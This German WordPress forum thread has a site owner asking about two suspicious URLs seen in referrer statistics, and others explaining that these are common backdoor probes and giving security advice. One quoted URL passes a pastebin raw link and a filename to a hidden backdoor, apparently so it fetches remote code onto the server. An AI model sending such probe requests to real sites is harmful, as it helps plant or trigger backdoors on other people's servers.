WP-Installation von Schadware befallen?

  • Guten Abend!

    Habe seit ca. 2 Jahren eine WP Installation laufen, bisher hat auch alles top funktioniert, bis auf dass mal der Name und die Adresse der Website durch nen Bug im Plugin "YellowPencil" geändert wurden. Das Problem konnte ich damals aber schnell beheben. (https://wordpress.org/support/topic/…t-yellowpencil/)

    Nun ist mir aber in meinem Statistik-Plugin aufgefallen das viele offensichtlich unseriöse bzw. zwielichtige Websites vorallem mit russischer TLD auf 2 Links

    meinedomain.tld/?xxxxxxxxxxxx_loads=1&xxxxxxxxxxxx_filename=info.txt&xxxxxxxxxxxx_filecontent=INF0
    meinedomain.tld//?testingfsoc=1&url=https://pastebin.com/raw/i1gLLhHJ&filename=wpdemos

    verweisen.

    Wenn ich die Links aufrufe gelange ich einfach nur auf die Startseite.

    Handelt es sich hierbei um eine Weiterleitung auf eine Datei o.ä. ?


    Da ich überall Strenge Passwörter verwende und alle meine Plugins aktuell halte kann ich mir nicht vorstellen das es sich hierbei um irgend eine Form von Schadware handelt.


    Hat einer von euch eine Idee was da los sein könnte? Könnte das evtl. noch mit dem "YellowPencil Hack" zusammenhängen ?

    Und hätte jemand evtl. ne Empfehlung für ein Taugliches Anti-Virus für Wordpress?

    Unten findet ihr noch eine Übersicht über meine verwendeten Plugins.

    Danke im Voraus und schöne Grüße!


    [Blockierte Grafik: https://i.imgur.com/b2P8c7p.png]

    Einmal editiert, zuletzt von eyoh58 (23. Februar 2020 um 23:25)

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Hi,

    stimmt die oben genannte Anzahl der Plugins [ Alle (10) ] mit den gelisteten (10 Stück) überein?
    https://labs.sucuri.net/webshell-in-fa…mrpb-directory/

    Wenn ja, unbedenklich. Hack-Versuche gibt es unzählige, wenn man mal die Access Logs durchgeht. Allerlei Aufrufe üblicher "Standard Backdoors" und Tests auf weit verbreitete Sicherheitslücken..
    Je bekannter eine Site, desto mehr davon gibt es.

    Du kannst dir die NinjaFirewall oder Wordfence mal anschauen.
    Ein Security Plugin ist aber nicht notwendig, wenn du die Updates ständig im Blick hast und zudem eine sinnvolle Backup Strategie verfolgst.
    Sensibilisiert bist du ja schon durch die YellowPencil Lücke.

    Gruß

    Pascal

    Sicherheitsexperte

  • Hi Pascal,

    danke für die Schnelle Antwort!

    Auf'm ftp unter wp-content/plugins liegen nur die 10 Ordner der 10 Plugins die ich auch Installiert habe.

    Schneit also alles in Ordnung zu sein.

    Jo, hatte bisher auch keine weiteren Probleme außer halt die Sache mit YellowPencil. Schau mir die 2 Plugins aber trotzdem mal an!

    Danke nochmal und Gruß

  • Fragen am Rande:

    Woher stammt dieses "Power Builder" Plugin? Wie alt ist es? Gäbe es Updates beim Hersteller?

    Welche Version des "YellowPencil" Plugins wird verwendet? Zitat von der Herstellerseite:

    Zitat

    Version 7.2.8 is out! – The last update was released on 18 February 2020


    Generell: Beim Posten von Pluginlisten am besten immer die Versionen mitposten...

  • Power Builder ist ein Pagebuilder von Templatemonster und war beim Theme dabei. Da gabs seit der Installation meines Wissens nach kein Updatet, zumindest habe ich bei Templatemonster keins gefunden.

    YellowPencil ist auf der aktuellsten version (7.2.8).

    Jo, danke für den Hinweis.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!